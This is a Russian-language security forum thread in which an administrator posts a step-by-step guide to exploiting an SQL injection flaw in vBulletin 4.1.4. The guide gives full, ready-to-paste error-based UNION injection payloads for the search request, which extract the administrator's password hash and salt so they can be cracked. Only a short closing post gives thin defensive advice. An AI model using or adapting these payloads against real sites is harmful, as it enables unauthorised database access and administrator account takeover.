• Привет !

    На форуме есть зеркало в ТОРе:rusfwz3cukdej7do.onion

    Обратная связь:info@ru-sfera.org

    Всего доброго !

Уязвимость в vBulletin 4 (1 Viewer)

Кто просматривает этот контент: "Тема" (Всего пользователей: 0; Гостей: 1)

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 387
Репутация
7 878
Telegram
Уязвимость пашет на vBulletin 4.1.4 на движках 4.х.х тоже должна фурычить.

amicmsdx71.jpg
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 387
Репутация
7 878
Telegram
Заходим, регистрируемся (не всегда обязательно, если поиск без всяких там капч и вопросов от имени гостя проходит, то рега не впёрлась).

Запускаем лису, плагин liveHTTPHeaders.

Вбиваем в поле поиска любую лабуду, например "4234234" и жмём enter

В liveHTTPHeaders редактируем запрос таким вот образом, дописывая это:

Код:
humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
Посмотреть вложение 99

Отправляем запрос, выйдет ошибка Database error
Смотрим исходный код, внизу находим хэш, записываем.

Теперь оправляем запрос на вывод соли, вот такой:

Код:
humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select salt from user where userid=1 and row(1,1)>(select count(*),concat( (select user.salt) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
Опять ошибка, опять смотрим исходный код, записываем соль.

Всё, осталось только расшифровать.

Иногда таблица не user называется, тогда хэш мы не увидим, а увидим на месте хэша какую-то лабуду, а чуть выше виден будет префикс, вот его и дописываем в наш запрос, и тогда всё бенч будет.
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 387
Репутация
7 878
Telegram
Как защититься:

Установить пароль не менее 12-ть символов, тогда хэш будет тяжело расшифровать.

Также рекомендую следить за обновлениями булки, так-как у неё КУЧА уязвимостей.

И самое главное, постарайтесь никого не злить и тогда взламывать никто не будет ! ;)
 
Автор темы Похожие темы Форум Ответы Дата
0 Новости и статьи IT безопасности 0
X-Shar Новости и статьи IT безопасности 0
X-Shar Новости и статьи IT безопасности 0
Антоха Новости и статьи IT безопасности 0
X-Shar Новости и статьи IT безопасности 1
X-Shar Новости и статьи IT безопасности 0
R Новости и статьи IT безопасности 0
X-Shar Новости и статьи IT безопасности 1
X-Shar Новости и статьи IT безопасности 3
X-Shar Новости и статьи IT безопасности 0
Ворошилов Новости и статьи IT безопасности 0
X-Shar Новости и статьи IT безопасности 0